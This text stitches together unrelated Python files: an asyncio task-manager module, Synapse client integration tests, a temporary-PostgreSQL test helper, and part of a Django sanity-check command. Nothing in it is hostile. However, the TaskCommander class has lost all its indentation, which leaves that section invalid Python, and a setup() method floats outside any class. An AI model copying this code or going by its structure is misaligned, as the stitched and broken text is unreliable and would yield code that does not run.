            await self.loop_init(*args, **kwargs)
            logger.debug('Loop init finished: ' + repr(self))
            # Wake anyone blocked in await_init().
            self._init_complete.set()
            try:
                while True:
                    # We need to guarantee that we give control back to the
                    # event loop at least once (even if running all synchronous
                    # code) to catch any cancellations.
                    # TODO: is there a better way than this?
                    await asyncio.sleep(0)
                    await self.loop_run()
            finally:
                # Clear init.
                self._init_complete.clear()
                logger.debug('Loop stop starting: ' + repr(self))
                # Prevent cancellation of the loop stop.
                await asyncio.shield(self.loop_stop())
                logger.debug('Loop stop finished: ' + repr(self))
        except asyncio.CancelledError:
            # Don't log the cancellation error, because it's expected shutdown
            # behavior.
            logger.debug('Looped task cancelled: ' + repr(self))
            raise
        except Exception as exc:
            # Log with full traceback before re-raising so loop failures are
            # never silent.
            logger.error(
                'Error while running looped task: ' + repr(self) +
                ' w/ traceback:\n' + ''.join(traceback.format_exc())
            )
            raise

    async def await_init(self):
        ''' Awaits for loop_init to complete. Won't work from within a
        TaskCommander.
        '''
        await self._init_complete.wait()
class TaskCommander(ManagedTask):
''' Sets up a ManagedTask to run tasks instead of just a single
coro.
TODO: support addition of tasks while running.
TODO: support removal of tasks while running.
TODO: support garbage collection of completed tasks.
TODO: consider creating managed tasks and task loopers through the
commander instead of independently?
'''
def __init__(self, *args, suppress_child_exceptions=False, **kwargs):
''' In addition to super(), we also need to add in some variable
inits.
'''
super().__init__(*args, **kwargs)
# Lookup for task -> future
self._futures_by_mgmts = {}
# Lookup for future -> task
self._mgmts_by_future = {}
# Lookup for order -> task, start args, start kwargs
# Order this so that startup completes as defined
self._to_start = []
self._invocations = {}
# Lookup for task -> result
self._results = {}
# Lookup to see which ones are taskloopers
self._mgmts_with_init = set()
# Notify that all mgmts have completed their inits.
self._init_complete = asyncio.Event(loop=self._loop)
self._stop_complete = asyncio.Event(loop=self._loop)
# This determines if a completed task that ended in an exception is
# just logged, or if it will bubble up and end the entire commander
self.suppress_child_exceptions = suppress_child_exceptions
def register_task(self, task, *args, before_task=None, after_task=None,
**kwargs):
''' Registers a task to start when the TaskCommander is run.
Since the task's _loop is replaced, this is an irreversable
action.
'''
if not isinstance(task, ManagedTask):
raise TypeError('Task must be a ManagedTask instance.')
elif task in self._to_start:
raise ValueError(
'Tasks can only be added once. Create a new instance of the ' +
'task to run multiple copies.'
)
elif bool(before_task) & bool(after_task):
raise ValueError(
'Task may be inserted before or after another task, but not ' +
'both!'
)
else:
self._insert_task(task, before_task, after_task, args, kwargs)
def _insert_task(self, task, before_task, after_task, args, kwargs):
''' Perform actual task insertion.
'''
if before_task is not None:
target_index = self._to_start.index(before_task)
self._to_start.insert(target_index, task)
elif after_task is not None:
target_index = self._to_start.index(after_task) + 1
self._to_start.insert(target_index, task)
else:
self._to_start.append(task)
self._invocations[task] = _TaskDef(args, kwargs)
# Wait to do this until after inserting task, so that any errors will
# prevent modification to the original task.
if hasattr(task, '_init_complete'):
task._init_complete = asyncio.Event(loop=self._loop)
task._stop_complete = asyncio.Event(loop=self._loop)
self._mgmts_with_init.add(task)
# This controls blocking for async stuff on exit
task._exiting_task = asyncio.Event(loop=self._loop)
task._loop = self._loop
async def _forward_harch(self):
''' Get them juices flowing! Start all tasks.
'''
tasks_available = []
for mgmt in self._to_start:
args, kwargs = self._invocations[mgmt]
task = asyncio.ensure_future(
mgmt._execute_task(args, kwargs)
)
self._futures_by_mgmts[mgmt] = task
self._mgmts_by_future[task] = mgmt
tasks_available.append(task)
# If it has an init, wait for that init to complete before
# starting the next task.
if mgmt in self._mgmts_with_init:
await mgmt._init_complete.wait()
return tasks_available
async def _company_halt(self, tasks):
''' Stop all of the remaining running tasks in tasks. Performed
in reverse order to starting.
'''
try:
logger.debug('Stopping all remaining tasks: ' + repr(self))
for task in reversed(tasks):
task.cancel()
# Wait for the task to exit and then clear all startup flags.
mgmt = self._mgmts_by_future[task]
logger.debug(repr(self) + ' awaiting task exit: ' + repr(mgmt))
await mgmt._exiting_task.wait()
mgmt._startup_complete_flag.clear()
# Wait until all tasks have finished closure.
# Only wait if we have things to wait for, or this will error out.
if tasks:
# And wait for them all to complete (note that this will
# delay shutdown!)
await asyncio.wait(
fs = tasks,
return_when = asyncio.ALL_COMPLETED,
# TODO: figure out some way to forcibly close stuff
timeout = None
)
except Exception:
logger.error(
'Error while stopping remaining tasks: ' + repr(self) + '\n' +
''.join(traceback.format_exc())
)
# Reset everything so it's possible to run again.
finally:
results = self._results
self._results = {}
self._futures_by_mgmts = {}
self._mgmts_by_future = {}
return results
async def task_run(self):
''' Runs all of the TaskCommander's tasks.
'''
try:
# Get all of the tasks started.
all_tasks = await self._forward_harch()
incomplete_tasks = set(all_tasks)
# Perform any post-tasklooper-init, pre-init-complete actions.
await self.setup()
# All of the tasks have been started, and all of the inits have
# completed. Notify any waiters.
self._init_complete.set()
# Wait for all tasks to complete (unless cancelled), but process
# any issues as they happen.
finished = None
# Wait until the first successful task completion
while incomplete_tasks:
finished, pending = await asyncio.wait(
fs = incomplete_tasks,
return_when = asyncio.FIRST_COMPLETED
)
# It IS possible to return more than one complete task, even
# though we've used FIRST_COMPLETED
for finished_task in finished:
logger.debug('Task finished: ' + repr(finished_task))
self._handle_completed(finished_task)
incomplete_tasks.remove(finished_task)
except asyncio.CancelledError:
# Don't log the traceback itself.
logger.debug('TaskCommander cancelled: ' + repr(self))
raise
except Exception as exc:
logger.error(
'Error during task command w/ traceback:\n' +
''.join(traceback.format_exc())
)
raise
# No matter what happens, cancel all tasks at exit.
finally:
# But first, run cleanup.
try:
await self.teardown()
# Ensure we always clear all futures, regardless of whether or not
# they are already completed, since cancellation is idempotent.
# this way, we can avoid a race condition between tasks that were
# already cancelled or finished above, but who have not yet
# completed shutdown, and the loop itself stopping.
finally:
results = await self._company_halt(all_tasks)
# This may or may not be useful. In particular, it will only be reached
# if all tasks finish before cancellation.
return results
def _handle_completed(self, task):
''' Handles a TaskLooper that completes without cancellation.
'''
try:
# Reset the task startup primitive
mgmt = self._mgmts_by_future[task]
mgmt._startup_complete_flag.clear()
exc = task.exception()
# If there's been an exception, continue waiting for the rest.
if exc is not None:
# Note cancellations, but don't propagate them backwards.
if isinstance(exc, asyncio.CancelledError):
logger.info('Daughter task cancelled: ' + repr(mgmt))
elif self.suppress_child_exceptions:
logger.error(
'Exception while running ' + repr(mgmt) + 'w/ ' +
'traceback:\n' + ''.join(traceback.format_exception(
type(exc), exc, exc.__traceback__)
)
)
else:
raise exc
else:
self._results[mgmt] = task.result()
# Don't really do anything with these?
except asyncio.CancelledError:
logger.info('Task completion cancelled: ' + repr(mgmt))
async def _kill_tasks(self):
''' Kill all remaining tasks. Call during shutdown. Will log any
and all remaining tasks.
'''
all_tasks = asyncio.Task.all_tasks()
for task in all_tasks:
if task is not self._looper_future:
logger.info('Task remains while closing loop: ' + repr(task))
task.cancel()
if len(all_tasks) > 0:
await asyncio.wait(all_tasks, timeout=self._death_timeout)
async def await_init(self):
''' Awaits for all TaskLooper (or similar) loop_inits to finish.
'''
await self._init_complete.wait()
async def teardown(self):
''' Called after cancellation is started, but before it takes
effect. Use it to create a finalizer, if desired.
'''
async def setup(self):
    ''' Called after all tasks have been started, and all tasklooper
    (or similar) instances have passed loop init.
    '''
    # Intentionally a no-op hook; subclasses override as needed.
class Aengel:
    ''' Watches for completion of the main thread and then automatically
    closes any other threaded objects (that have been registered with
    the Aengel) by calling their close methods.
    TODO: redo this as a subclass of threading.Thread.
    '''

    def __init__(self, threadname='aengel', guardlings=None):
        ''' Creates an aengel.

        Uses threadname as the thread name.

        guardlings is an iterable of threaded objects to watch. Each
        must have a stop_threadsafe() method, which will be invoked upon
        completion of the main thread, from the aengel's own thread. The
        aengel WILL NOT prevent garbage collection of the guardling
        objects; they are internally referenced weakly.

        They will be called **in the order that they were added.**
        '''
        # I would really prefer this to be an orderedset, but oh well.
        # That would actually break weakref proxies anyways.
        self._guardlings = collections.deque()
        self._dead = False
        self._stoplock = threading.Lock()

        if guardlings is not None:
            for guardling in guardlings:
                self.append_guardling(guardling)

        # Daemonized so the aengel itself never keeps the process alive.
        self._thread = threading.Thread(
            target=self._watcher,
            daemon=True,
            name=threadname,
        )
        self._thread.start()

    @staticmethod
    def _as_proxy(guardling):
        ''' Return a weakref proxy for guardling (or guardling itself if
        it already is one). Shared by append/prepend to avoid duplicating
        the wrapping logic.
        '''
        if not isinstance(guardling, weakref.ProxyTypes):
            guardling = weakref.proxy(guardling)
        return guardling

    def append_guardling(self, guardling):
        ''' Register guardling at the end of the stop order. '''
        self._guardlings.append(self._as_proxy(guardling))

    def prepend_guardling(self, guardling):
        ''' Register guardling at the front of the stop order. '''
        self._guardlings.appendleft(self._as_proxy(guardling))

    def remove_guardling(self, guardling):
        ''' Attempts to remove the first occurrence of the guardling.
        Raises ValueError if guardling is unknown.
        '''
        try:
            self._guardlings.remove(guardling)
        except ValueError:
            logger.error('Missing guardling ' + repr(guardling))
            logger.error('State: ' + repr(self._guardlings))
            raise

    def _watcher(self):
        ''' Automatically watches for termination of the main thread and
        then closes the autoresponder and server gracefully.
        '''
        main = threading.main_thread()
        main.join()
        self.stop()

    def stop(self, *args, **kwargs):
        ''' Call stop_threadsafe on all guardlings.

        Idempotent and thread-safe: the lock plus the _dead flag
        guarantee the guardlings are stopped at most once.
        '''
        with self._stoplock:
            if not self._dead:
                for guardling in self._guardlings:
                    try:
                        guardling.stop_threadsafe_nowait()
                    except Exception:
                        # This is very precarious. Swallow all exceptions.
                        logger.error(
                            'Swallowed exception while closing ' +
                            repr(guardling) + '.\n' +
                            ''.join(traceback.format_exc())
                        )
                self._dead = True
class NoopLoop(TaskLooper):
    ''' Make a dummy event loop for manipulation of stuff. Intended for
    use in testing.
    '''

    async def loop_run(self):
        # Idle briefly each pass so the loop yields control without
        # doing any real work.
        await asyncio.sleep(.1)
| |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import six
from builtins import str
import tempfile, time, os, re, sys, filecmp, shutil, requests, json
import uuid, random, base64
from datetime import datetime
from nose.tools import assert_raises
import synapseclient.client as client
import synapseclient.utils as utils
from synapseclient.exceptions import *
from synapseclient.evaluation import Evaluation
from synapseclient.entity import Project, File
from synapseclient.annotations import to_submission_status_annotations, from_submission_status_annotations, set_privacy
from synapseclient.team import Team, TeamMember
import integration
from integration import schedule_for_cleanup
def setup(module):
    """Print a banner naming this test module, then bind the shared
    integration fixtures (client, project, secondary user) onto it."""
    banner = '~' * 60
    print('\n')
    print(banner)
    print(os.path.basename(__file__))
    print(banner)

    module.syn = integration.syn
    module.project = integration.project
    module.other_user = integration.other_user
def test_evaluations():
    """End-to-end exercise of the Evaluation APIs: create, fetch (by name
    and by project), update, permissions, submissions, scoring,
    annotations, annotation queries, and cleanup."""
    # Create an Evaluation
    name = 'Test Evaluation %s' % str(uuid.uuid4())
    ev = Evaluation(name=name, description='Evaluation for testing',
                    contentSource=project['id'], status='CLOSED')
    ev = syn.store(ev)

    try:
        # -- Get the Evaluation by name
        evalNamed = syn.getEvaluationByName(name)
        assert ev['contentSource'] == evalNamed['contentSource']
        assert ev['createdOn'] == evalNamed['createdOn']
        assert ev['description'] == evalNamed['description']
        assert ev['etag'] == evalNamed['etag']
        assert ev['id'] == evalNamed['id']
        assert ev['name'] == evalNamed['name']
        assert ev['ownerId'] == evalNamed['ownerId']
        assert ev['status'] == evalNamed['status']

        # -- Get the Evaluation by project
        evalProj = syn.getEvaluationByContentSource(project)
        evalProj = next(evalProj)
        assert ev['contentSource'] == evalProj['contentSource']
        assert ev['createdOn'] == evalProj['createdOn']
        assert ev['description'] == evalProj['description']
        assert ev['etag'] == evalProj['etag']
        assert ev['id'] == evalProj['id']
        assert ev['name'] == evalProj['name']
        assert ev['ownerId'] == evalProj['ownerId']
        assert ev['status'] == evalProj['status']

        # Update the Evaluation
        ev['status'] = 'OPEN'
        ev = syn.store(ev, createOrUpdate=True)
        assert ev.status == 'OPEN'

        # # Add the current user as a participant
        myOwnerId = int(syn.getUserProfile()['ownerId'])
        syn._allowParticipation(ev, myOwnerId)

        # AUTHENTICATED_USERS = 273948
        # PUBLIC = 273949
        syn.setPermissions(ev, 273948, accessType=['READ'])
        syn.setPermissions(ev, 273949, accessType=['READ'])

        # test getPermissions
        permissions = syn.getPermissions(ev, 273949)
        assert ['READ'] == permissions

        permissions = syn.getPermissions(ev, syn.getUserProfile()['ownerId'])
        # BUG FIX: the old `assert [p in permissions for p in [...]]` built a
        # non-empty list, which is always truthy, so it could never fail.
        assert all(p in permissions
                   for p in ['READ', 'CREATE', 'DELETE', 'UPDATE',
                             'CHANGE_PERMISSIONS', 'READ_PRIVATE_SUBMISSION'])

        # Test getSubmissions with no Submissions (SYNR-453)
        submissions = syn.getSubmissions(ev)
        assert len(list(submissions)) == 0

        # -- Get a Submission attachment belonging to another user (SYNR-541) --
        # See if the configuration contains test authentication
        if other_user['username']:
            print("Testing SYNR-541")

            # Login as the test user
            testSyn = client.Synapse(skip_checks=True)
            testSyn.login(email=other_user['username'], password=other_user['password'])
            testOwnerId = int(testSyn.getUserProfile()['ownerId'])

            # Make a project
            other_project = Project(name=str(uuid.uuid4()))
            other_project = testSyn.createEntity(other_project)

            # Give the test user permission to read and join the evaluation
            syn._allowParticipation(ev, testOwnerId)

            # Make a file to submit
            with tempfile.NamedTemporaryFile(mode="w", delete=False) as f:
                filename = f.name
                f.write(str(random.gauss(0, 1)) + '\n')
            f = File(filename, parentId=other_project.id,
                     name='Submission 999',
                     description="Haha! I'm inaccessible...")
            entity = testSyn.store(f)

            ## test submission by evaluation ID
            submission = testSyn.submit(ev.id, entity, submitterAlias="My Nickname")

            # Mess up the cached file so that syn._getWithEntityBundle must download again
            os.utime(filename, (0, 0))

            # Grab the Submission as the original user
            fetched = syn.getSubmission(submission['id'])
            assert os.path.exists(fetched['filePath'])

            # make sure the fetched file is the same as the original (PLFM-2666)
            assert filecmp.cmp(filename, fetched['filePath'])
        else:
            print('Skipping test for SYNR-541: No [test-authentication] in %s' % client.CONFIG_FILE)

        # Increase this to fully test paging by getEvaluationSubmissions
        # not to be less than 2
        num_of_submissions = 2

        # Create a bunch of Entities and submit them for scoring
        print("Creating Submissions")
        for i in range(num_of_submissions):
            with tempfile.NamedTemporaryFile(mode="w", delete=False) as f:
                filename = f.name
                f.write(str(random.gauss(0, 1)) + '\n')
            f = File(filename, parentId=project.id, name='entry-%02d' % i,
                     description='An entry for testing evaluation')
            entity = syn.store(f)
            syn.submit(ev, entity, name='Submission %02d' % i, submitterAlias='My Team')

        # Score the submissions
        submissions = syn.getSubmissions(ev, limit=num_of_submissions - 1)
        print("Scoring Submissions")
        for submission in submissions:
            assert re.match(r'Submission \d+', submission['name'])
            status = syn.getSubmissionStatus(submission)
            status.score = random.random()
            if submission['name'] == 'Submission 01':
                status.status = 'INVALID'
                status.report = 'Uh-oh, something went wrong!'
            else:
                status.status = 'SCORED'
                status.report = 'a fabulous effort!'
            syn.store(status)

        # Annotate the submissions
        print("Annotating Submissions")
        bogosity = {}
        submissions = syn.getSubmissions(ev)
        b = 123
        for submission, status in syn.getSubmissionBundles(ev):
            bogosity[submission.id] = b
            a = dict(foo='bar', bogosity=b)
            b += 123
            status['annotations'] = to_submission_status_annotations(a)
            set_privacy(status['annotations'], key='bogosity', is_private=False)
            syn.store(status)

        # Test that the annotations stuck
        for submission, status in syn.getSubmissionBundles(ev):
            a = from_submission_status_annotations(status.annotations)
            assert a['foo'] == 'bar'
            assert a['bogosity'] == bogosity[submission.id]
            for kvp in status.annotations['longAnnos']:
                if kvp['key'] == 'bogosity':
                    assert kvp['isPrivate'] == False

        # test query by submission annotations
        # These queries run against an eventually consistent index table which is
        # populated by an asynchronous worker. Thus, the queries may remain out
        # of sync for some unbounded, but assumed to be short time.
        attempts = 2
        while attempts > 0:
            try:
                print("Querying for submissions")
                # NOTE(review): the +1 assumes the SYNR-541 submission above
                # was made — confirm when [test-authentication] is absent.
                results = syn.restGET("/evaluation/submission/query?query=SELECT+*+FROM+evaluation_%s" % ev.id)
                print(results)
                assert len(results['rows']) == num_of_submissions + 1

                results = syn.restGET("/evaluation/submission/query?query=SELECT+*+FROM+evaluation_%s where bogosity > 200" % ev.id)
                print(results)
                assert len(results['rows']) == num_of_submissions
            except AssertionError as ex1:
                print("failed query: ", ex1)
                attempts -= 1
                if attempts > 0:
                    print("retrying...")
                time.sleep(2)
            else:
                attempts = 0

        ## Test that we can retrieve submissions with a specific status
        invalid_submissions = list(syn.getSubmissions(ev, status='INVALID'))
        assert len(invalid_submissions) == 1, len(invalid_submissions)
        assert invalid_submissions[0]['name'] == 'Submission 01'

    finally:
        # Clean up
        syn.delete(ev)
        if 'testSyn' in locals():
            if 'other_project' in locals():
                # Clean up, since the current user can't access this project
                # This also removes references to the submitted object :)
                testSyn.delete(other_project)
            if 'team' in locals():
                ## remove team
                testSyn.delete(team)

    ## Just deleted it. Shouldn't be able to get it.
    assert_raises(SynapseHTTPError, syn.getEvaluation, ev)
def test_teams():
    """Create a team, verify the creating user is a member, and check the
    (eventually consistent) lookup of the team by name."""
    name = "My Uniquely Named Team " + str(uuid.uuid4())
    team = syn.store(Team(name=name, description="A fake team for testing..."))
    schedule_for_cleanup(team)

    # Lookup by id must round-trip the stored team.
    assert syn.getTeam(team.id) == team

    profile = syn.getUserProfile()
    found = None
    for membership in syn.getTeamMembers(team):
        if membership.member.ownerId == profile.ownerId:
            found = membership
            break
    assert found is not None, "Couldn't find user {} in team".format(profile.username)

    ## needs to be retried 'cause appending to the search index is asynchronous
    found_team = None
    for attempt in range(10):
        try:
            found_team = syn.getTeam(name)
            break
        except ValueError:
            if attempt < 9:
                time.sleep(1)
    assert team == found_team
| |
# -*- coding: utf-8 -*-
# Copyright 2013 Takeshi KOMIYA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import socket
import signal
import pg8000
import tempfile
import subprocess
from glob import glob
from time import sleep
from shutil import copytree, rmtree
from datetime import datetime
from contextlib import closing
# Public API of this module.
__all__ = ['Postgresql', 'skipIfNotFound']

# Installation prefixes searched for the PostgreSQL binaries when they
# are not found via `which`.
SEARCH_PATHS = (['/usr/local/pgsql', '/usr/local'] +
                glob('/usr/lib/postgresql/*') +  # for Debian/Ubuntu
                glob('/opt/local/lib/postgresql*'))  # for MacPorts

# Defaults for Postgresql(**kwargs); auto_start=2 means "run setup() and
# start()", 1 means "start() only", 0/None means manual control.
DEFAULT_SETTINGS = dict(auto_start=2,
                        base_dir=None,
                        initdb=None,
                        initdb_args='-U postgres -A trust',
                        postgres=None,
                        postgres_args='-h 127.0.0.1 -F -c logging_collector=off',
                        pid=None,
                        port=None,
                        copy_data_from=None)
class Postgresql(object):
    """Manages a throwaway PostgreSQL server for tests: creates a data
    directory, runs initdb, forks a postgres process on an unused port,
    and tears everything down afterwards. Settings come from
    DEFAULT_SETTINGS and can be overridden via keyword arguments."""

    def __init__(self, **kwargs):
        self.settings = dict(DEFAULT_SETTINGS)
        self.settings.update(kwargs)
        # pid of the forked postgres process; None while stopped.
        self.pid = None
        # Remember the creating process so forked children never stop it.
        self._owner_pid = os.getpid()
        self._use_tmpdir = False

        if self.base_dir:
            if self.base_dir[0] != '/':
                # Normalize a relative base_dir against the cwd.
                self.settings['base_dir'] = os.path.join(os.getcwd(), self.base_dir)
        else:
            self.settings['base_dir'] = tempfile.mkdtemp()
            self._use_tmpdir = True

        if self.initdb is None:
            self.settings['initdb'] = find_program('initdb', ['bin'])

        if self.postgres is None:
            self.settings['postgres'] = find_program('postgres', ['bin'])

        if self.auto_start:
            # auto_start >= 2 also runs setup(); auto_start == 1 only starts.
            if self.auto_start >= 2:
                self.setup()

            self.start()

    def __del__(self):
        # Best-effort shutdown if the caller forgot to stop().
        self.stop()

    def __enter__(self):
        return self

    def __exit__(self, *args):
        self.stop()

    def __getattr__(self, name):
        # Expose settings entries (port, base_dir, ...) as attributes.
        if name in self.settings:
            return self.settings[name]
        else:
            raise AttributeError("'Postgresql' object has no attribute '%s'" % name)

    def dsn(self, **kwargs):
        """Return connection parameters as a dict suitable for
        pg8000.connect(**params); kwargs override the defaults."""
        # "database=test host=localhost user=postgres"
        params = dict(kwargs)
        params.setdefault('port', self.port)
        params.setdefault('host', '127.0.0.1')
        params.setdefault('user', 'postgres')
        params.setdefault('database', 'test')
        return params

    def url(self, **kwargs):
        """Return a postgresql:// URL for this server (e.g. for SQLAlchemy)."""
        params = self.dsn(**kwargs)
        url = ('postgresql://%s@%s:%d/%s' %
               (params['user'], params['host'], params['port'], params['database']))
        return url

    def setup(self):
        """Create the data/tmp directory layout and initialize the cluster
        with initdb (skipped if a cluster is already present)."""
        # copy data files
        if self.copy_data_from:
            try:
                copytree(self.copy_data_from, os.path.join(self.base_dir, 'data'))
                os.chmod(os.path.join(self.base_dir, 'data'), 0o700)
            except Exception as exc:
                raise RuntimeError("could not copytree %s to %s: %r" %
                                   (self.copy_data_from, os.path.join(self.base_dir, 'data'), exc))

        # (re)create directory structure
        for subdir in ['data', 'tmp']:
            path = os.path.join(self.base_dir, subdir)
            if not os.path.exists(path):
                os.makedirs(path)
            # postgres refuses to start when the data dir is group/other
            # accessible, hence 0o700.
            os.chmod(path, 0o700)

        # initdb — PG_VERSION marks an already-initialized cluster
        if not os.path.exists(os.path.join(self.base_dir, 'data', 'PG_VERSION')):
            args = ([self.initdb, '-D', os.path.join(self.base_dir, 'data'), '--lc-messages=C'] +
                    self.initdb_args.split())
            try:
                p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                output, err = p.communicate()
                if p.returncode != 0:
                    raise RuntimeError("initdb failed: %r" % err)
            except OSError as exc:
                raise RuntimeError("failed to spawn initdb: %s" % exc)

    def start(self):
        """Fork and exec the postgres server, wait (up to ~10s) until it
        accepts connections, then ensure a 'test' database exists."""
        if self.pid:
            return  # already started

        if self.port is None:
            self.port = get_unused_port()

        logger = open(os.path.join(self.base_dir, 'tmp', 'postgresql.log'), 'wt')
        pid = os.fork()
        if pid == 0:
            # Child process: redirect stdout/stderr into the log file,
            # then replace ourselves with the postgres server.
            os.dup2(logger.fileno(), sys.__stdout__.fileno())
            os.dup2(logger.fileno(), sys.__stderr__.fileno())

            try:
                os.execl(self.postgres, self.postgres,
                         '-p', str(self.port),
                         '-D', os.path.join(self.base_dir, 'data'),
                         '-k', os.path.join(self.base_dir, 'tmp'),
                         *self.postgres_args.split())
            except Exception as exc:
                raise RuntimeError('failed to launch postgres: %r' % exc)
        else:
            # Parent process: remember the child's pid and poll for
            # readiness. A reaped child means postgres died on startup.
            logger.close()
            self.pid = pid

            exec_at = datetime.now()
            while True:
                if os.waitpid(pid, os.WNOHANG)[0] != 0:
                    raise RuntimeError("*** failed to launch postgres ***\n" + self.read_log())

                if self.is_connection_available():
                    break

                if (datetime.now() - exec_at).seconds > 10.0:
                    raise RuntimeError("*** failed to launch postgres (timeout) ***\n" + self.read_log())

                sleep(0.1)

            # create test database
            with closing(pg8000.connect(**self.dsn(database='postgres'))) as conn:
                conn.autocommit = True
                with closing(conn.cursor()) as cursor:
                    cursor.execute("SELECT COUNT(*) FROM pg_database WHERE datname='test'")
                    if cursor.fetchone()[0] <= 0:
                        cursor.execute('CREATE DATABASE test')

    def stop(self, _signal=signal.SIGINT):
        """Terminate the server and then remove temporary files."""
        self.terminate(_signal)
        self.cleanup()

    def terminate(self, _signal=signal.SIGINT):
        """Signal the server and wait (up to ~10s) for it to exit,
        escalating to SIGKILL on timeout. Safe to call when stopped."""
        if self.pid is None:
            return  # not started

        if self._owner_pid != os.getpid():
            return  # could not stop in child process

        try:
            os.kill(self.pid, _signal)
            killed_at = datetime.now()
            # waitpid raises OSError (ECHILD) once the child has been
            # reaped, which is what exits this loop via the handler below.
            while (os.waitpid(self.pid, os.WNOHANG)):
                if (datetime.now() - killed_at).seconds > 10.0:
                    os.kill(self.pid, signal.SIGKILL)
                    raise RuntimeError("*** failed to shutdown postgres (timeout) ***\n" + self.read_log())

                sleep(0.1)
        except OSError:
            pass

        self.pid = None

    def cleanup(self):
        """Remove the temporary base_dir, but only if we created it and
        the server is no longer running."""
        if self.pid is not None:
            return  # still running; leave the data directory alone

        if self._use_tmpdir and os.path.exists(self.base_dir):
            rmtree(self.base_dir, ignore_errors=True)
            self._use_tmpdir = False

    def read_log(self):
        """Return the contents of the server log (tmp/postgresql.log)."""
        try:
            with open(os.path.join(self.base_dir, 'tmp', 'postgresql.log')) as log:
                return log.read()
        except Exception as exc:
            raise RuntimeError("failed to open file:tmp/postgresql.log: %r" % exc)

    def is_connection_available(self):
        """Return True once the server accepts connections, probed against
        the always-present template1 database."""
        try:
            with closing(pg8000.connect(**self.dsn(database='template1'))):
                pass
        except pg8000.Error:
            return False
        else:
            return True
def skipIfNotInstalled(arg=None):
    """Test decorator that skips when PostgreSQL is not installed.

    Usable bare (``@skipIfNotInstalled``, which looks for the
    ``postgres`` binary) or with an explicit path argument
    (``@skipIfNotInstalled('/path/to/postgres')``, which checks that the
    path exists).
    """
    if sys.version_info < (2, 7):
        from unittest2 import skipIf
    else:
        from unittest import skipIf

    def decorator(fn, path=arg):
        if path:
            cond = not os.path.exists(path)
        else:
            try:
                find_program('postgres', ['bin'])  # raise exception if not found
                cond = False
            except Exception:
                # BUG FIX: was a bare `except:`, which also swallowed
                # KeyboardInterrupt/SystemExit. find_program() raises
                # RuntimeError when the binary cannot be located.
                cond = True  # not found
        return skipIf(cond, "PostgreSQL not found")(fn)

    if callable(arg):  # execute as simple decorator
        return decorator(arg, None)
    else:  # execute with path argument
        return decorator


# Backwards-compatible alias.
skipIfNotFound = skipIfNotInstalled
def find_program(name, subdirs):
    """Locate the executable `name`: first via `which`, then under each
    SEARCH_PATHS prefix joined with the given subdirs. Raises
    RuntimeError when the command cannot be found anywhere."""
    found = get_path_of(name)
    if found:
        return found

    candidates = (os.path.join(prefix, subdir, name)
                  for prefix in SEARCH_PATHS
                  for subdir in subdirs)
    for candidate in candidates:
        if os.path.exists(candidate):
            return candidate

    raise RuntimeError("command not found: %s" % name)
def get_path_of(name):
    """Return the path of `name` as reported by `which`, or None when
    `which` is unavailable or finds nothing."""
    try:
        process = subprocess.Popen(['/usr/bin/which', name],
                                   stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE)
        path = process.communicate()[0]
    except OSError:
        # BUG FIX: some systems do not ship /usr/bin/which; previously
        # this raised OSError instead of returning None, preventing
        # find_program() from falling back to SEARCH_PATHS.
        return None
    if path:
        return path.rstrip().decode('utf-8')
    else:
        return None
def get_unused_port():
    """Ask the OS for an ephemeral TCP port, release it, and return the
    port number (free at the time of the call, not reserved)."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        probe.bind(('localhost', 0))
        port = probe.getsockname()[1]
    finally:
        probe.close()
    return port
| |
from pathlib import Path
import subprocess
import re
import sys
import urllib.request
import urllib.error
import json
from django.core.management.base import BaseCommand
from django.conf import settings
from django.db import connections
from django.db.utils import OperationalError
# Supported elasticsearch version range (inclusive bounds).
ELASTICSEARCH_MIN_VERSION = (2, 0, 0)
ELASTICSEARCH_MAX_VERSION = (2, 4, 4)
# Minimum supported readpst (libpst) version.
PST_MIN_VERSION = (0, 2, 0)
# Minimum supported Apache Tika server version.
TIKA_MIN_VERSION = (1, 13)
def path_exists(path):
    """Return True when the given filesystem path exists."""
    candidate = Path(path)
    return candidate.exists()
def http_get_content(link):
    """GET `link` and return the raw response body, or None when the
    request fails with an HTTP or URL error."""
    try:
        with urllib.request.urlopen(link) as response:
            body = response.read()
    except (urllib.error.HTTPError, urllib.error.URLError):
        return None
    return body
def get_version(exe_path, version_argument='--version',
                regex=r'([\d\.]+)', check_output=True,
                is_numeric=True):
    """Run `exe_path version_argument` and extract a version with `regex`.

    With check_output=True the command must succeed (stdout only);
    otherwise stderr is folded into stdout and failures are tolerated.
    Returns a tuple of ints when is_numeric, the raw matched string
    otherwise, or None when the regex does not match.
    """
    if check_output:
        raw = subprocess.check_output([exe_path, version_argument])
    else:
        raw = subprocess.run(
            [exe_path, version_argument],
            check=False,
            stderr=subprocess.STDOUT,
            stdout=subprocess.PIPE).stdout

    match = re.search(regex, str(raw), re.MULTILINE)
    if match is None:
        return None

    captured = match.group(1)
    if not is_numeric:
        return captured
    return tuple(int(part) for part in captured.split("."))
class Command(BaseCommand):
    help = "Sanity check for snoop. Run with no arguments."

    def handle(self, *args, **options):
        """Run every configured checker (skipping those whose feature is
        disabled in settings) and exit with status 1 on any failure."""
        checkers = [
            ('python', self.check_python, False),
            ('database', self.check_database, False),
            ('elasticsearch', self.check_es, False),
            ('msgconvert', self.check_msgconvert, settings.SNOOP_MSGCONVERT_SCRIPT is None),
            ('readpst', self.check_readpst, settings.SNOOP_READPST_BINARY is None),
            ('Apache Tika', self.check_tika, settings.SNOOP_TIKA_SERVER_ENDPOINT is None),
            ('7z', self.check_7z, settings.SNOOP_SEVENZIP_BINARY is None),
            ('gpg', self.check_gpg, settings.SNOOP_GPG_BINARY is None),
        ]
        have_errors = False
        for name, check_fun, skip in checkers:
            if skip:
                self.print_message("Skipping the check for " + name + ".")
            else:
                self.print_message("Checking " + name + ".")
                result = check_fun()
                if result:
                    self.print_success(' ' * 9 + name + " ok.")
                else:
                    have_errors = True
                    self.print_error(name + " failed the check.")
        self.print_message('')
